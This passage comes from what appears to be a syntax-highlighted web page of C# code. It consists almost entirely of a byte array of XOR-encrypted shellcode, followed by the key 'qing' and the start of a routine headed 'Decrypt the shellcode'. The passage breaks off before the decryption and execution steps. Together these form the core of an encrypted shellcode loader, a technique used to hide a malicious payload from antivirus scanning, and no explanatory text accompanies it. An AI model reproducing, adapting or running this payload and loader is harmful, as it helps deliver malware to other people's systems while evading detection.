class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x70&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xba&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x54&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x66&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa7&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x58&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xcb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x63&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x66&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x87&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x13&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x9f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x14&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x95&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x55&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x68&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x65&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x25&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x29&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x75&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x66&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x43&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x55&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x35&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x06&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x28&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x33&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x36&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x7b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x85&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xea&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x55&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x71&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x06&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x02&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x33&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x19&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x25&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x19&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x76&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x86&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfe&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x66&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x71&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x47&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x25&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x39&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x06&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xf1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x02&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x03&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x19&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x76&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x88&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x37&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x21&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x39&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x27&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x21&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x29&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x9b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x66&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x87&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xf9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x61&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x39&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xcc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x06&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xeb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa7&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x05&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x63&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x29&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x79&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x82&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x16&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x67&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x04&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x63&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x27&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x06&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x65&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xea&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x96&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x67&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x5f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x29&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x06&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x67&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x61&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x06&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xfa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x71&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x30&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x19&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb7&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xaf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x96&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xbb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x89&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x13&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x29&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x27&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x71&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x04&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x67&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x21&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x65&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x7e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x59&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x26&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x09&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x08&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x37&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x6b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x55&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x66&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xeb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x17&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x96&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xea&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x96&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x91&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x70&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xaa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x47&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x04&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xad&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xdc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x81&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xdc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xcc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x1b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x69&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x98&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xa4&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"qing"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;cipherType&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"xor"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;


            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="c1"&gt;//--------------------------------------------------------------&lt;/span&gt;
            &lt;span class="c1"&gt;// Decrypt the shellcode&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherType&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s"&gt;"xor"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
